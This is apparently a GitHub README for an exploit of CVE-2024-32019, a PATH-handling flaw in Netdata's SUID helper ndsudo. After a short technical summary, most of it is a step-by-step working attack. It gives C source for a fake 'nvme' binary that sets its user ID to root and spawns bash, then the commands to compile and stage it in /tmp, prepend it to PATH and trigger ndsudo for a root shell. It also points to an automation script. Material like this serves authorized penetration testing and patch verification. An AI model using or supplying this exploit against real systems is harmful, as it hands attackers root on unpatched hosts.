Summary
A Python-based exploit for CVE-2024-32019, a high-severity Local Privilege Escalation vulnerability in the Netdata Agent, leveraging a misconfigured SUID binary (ndsudo) that fails to securely handle the PATH environment variable.
This code is for educational and authorized testing purposes only. Unauthorized use of this tool against systems you do not own or have explicit permission to test is illegal.
🔍 Overview
CVE ID: CVE-2024-32019
CVSS Score: 8.8 (High)
Disclosed: April 12, 2024
Component: Netdata Agent
Affected Versions:
>= v1.45.0, < v1.45.3>= v1.44.0-60, < v1.45.0-169
🧠 Technical Summary
Netdata’s ndsudo tool is a SUID root binary intended to securely execute a limited set of system commands (like nvme) on behalf of non-root users.
However, due to an implementation flaw, it honors the user-controlled PATH variable when resolving command binaries. If an attacker can manipulate the PATH to include a writeable directory containing a malicious binary, ndsudo will execute it with root privileges — resulting in a local privilege escalation.
💥 Manual Exploitation Steps
The following steps demonstrate how to manually exploit the vulnerability in ndsudo.
1. Create a Privilege Escalation Binary
Save the following C code as nvme.c:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
int main() {
setuid(0);
setgid(0);
execl("/bin/bash", "bash", NULL);
return 0;
}
2. Compile the Exploit
gcc nvme.c -o nvme
3. Prepare the Exploit Environment on the Target
mkdir -p /tmp/fakebin
mv nvme /tmp/fakebin/
chmod +x /tmp/fakebin/nvme
4. Modify the PATH
export PATH=/tmp/fakebin:$PATH
which nvme
# Output: /tmp/fakebin/nvme
5. Trigger the Exploit
/opt/netdata/usr/libexec/netdata/plugins.d/ndsudo nvme-list
If successful, you’ll get a root shell.
# whoami
root
Automatic Exploitation
Github Repo link https://github.com/dollarboysushil/CVE-2024-32019-Netdata-ndsudo-PATH-Vulnerability-Privilege-Escalation
If you have ssh access, you can use CVE-2024-32019-dbs.py to automate this.
